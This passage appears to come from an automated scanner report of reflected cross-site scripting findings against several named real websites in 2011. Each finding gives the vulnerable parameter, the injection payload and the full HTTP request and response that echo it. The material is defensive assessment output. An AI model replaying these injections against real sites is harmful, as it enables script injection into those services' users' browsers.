Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7d3b'-alert(1)-'3a651942118 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36db'-alert(1)-'88fe32dd8cb was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4636974.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3405c<script>alert(1)</script>5c1b265328d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4636974.js?callback=videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3424
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close

videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:20 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:20 EDT","generato
...[SNIP]...
1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637817.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8ccd5<script>alert(1)</script>b3185344794 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637817.js?callback=videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3691
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:34 GMT
Connection: close

videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:34 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:34 EDT","generato
...[SNIP]...
1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637903.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e4c1f<script>alert(1)</script>00880e542be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637903.js?callback=videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540673464%3B%20omtr_lv%3D1302538873468%7C1397146873468%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540673468%3B%20s_nr%3D1302538873476%7C1305130873476%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3507
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:31:30 GMT
Connection: close

videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:31:27 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:31:27 EDT","generato
...[SNIP]...
1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4638065.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37528<script>alert(1)</script>7470e4c716a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4638065.js?callback=videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a&template=grab&cb=201141113 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302543673824%3B%20omtr_lv%3D1302541873827%7C1397149873827%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302543673827%3B%20s_nr%3D1302541873831%7C1305133873831%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3667
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 17:21:44 GMT
Connection: close

videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 13:21:44 EDT","lastBuildDate":"Mon, 11 Apr 2011 13:21:44 EDT","generato
...[SNIP]...
1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d9ff'-alert(1)-'bb75a418f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=506952470-4/9/2011 8:31:30 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Length: 39277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
if (intMode == 0) {
//User is not yet logged into UP and connecting to FB for the first time
window.location.href = '/engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1&FBConnect=1';
} else if (intMode == 1) {
//User is already logged into Upickem but connecting to FB for the first time
window.location.href =
...[SNIP]...
1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/ad.js.php

Issue detail

The value of the adWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33f0"%3balert(1)//4cbe115c7e1 was submitted in the adWidth parameter. This input was echoed as b33f0";alert(1)//4cbe115c7e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/ad.js.php?clientID=7cbbc409ec990f19c78c75bd1e06f215&adWidth=300b33f0"%3balert(1)//4cbe115c7e1&adHeight=250&campaign_api=dispCamp.getNextCampaign&api_url=api.placelocal.com&domain_name=wptz.placelocal.com&tracking_url=tracking.placelocal.com HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:25 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:25 GMT
Vary: Accept-Encoding
Content-Length: 11077

var scripts_uufugb = document.getElementsByTagName('script');var scriptEl_uufugb = scripts_uufugb[ scripts_uufugb.length - 1 ];var scriptParent_uufugb = scriptEl_uufugb.parentNode;var queryString_uufu
...[SNIP]...
parent', allowScriptAccess: 'always' }; /* C4 */ var attributes = { id:'Ad_uufugb' }; var uniqueId = Math.ceil(Math.random()*500); /* C5 */var swfUrl = "http://"+domain_name_uufugb+"/flash/Ad_Frame_300b33f0";alert(1)//4cbe115c7e1.swf"; var firstParam = true; if (click_tag_uufugb != '') { swfUrl += (firstParam == true ? '?' : '&'); swfUrl += 'clickTag=' + click_tag_uufugb; firstParam = false; } if (random_uufugb != '') { swfUrl
...[SNIP]...
1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the loadedparam request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e33"%3balert(1)//87ea4282f21 was submitted in the loadedparam parameter. This input was echoed as 11e33";alert(1)//87ea4282f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=011e33"%3balert(1)//87ea4282f21&suffix=_e6ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:34 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:34 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs2(011e33";alert(1)//87ea4282f21);
1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c73c"%3balert(1)//c2b1bed343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c73c";alert(1)//c2b1bed343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6/8c73c"%3balert(1)//c2b1bed343ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:39 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:39 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ility(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6/8c73c";alert(1)//c2b1bed343ugs2(0);
1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the suffix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1470b"%3balert(1)//aba93548af6 was submitted in the suffix parameter. This input was echoed as 1470b";alert(1)//aba93548af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6ugs21470b"%3balert(1)//aba93548af6 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:36 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:36 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ty(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs21470b";alert(1)//aba93548af6(0);
1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /action/event_signup/1066

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be0c7"><script>alert(1)</script>c3045ca88cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/events/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
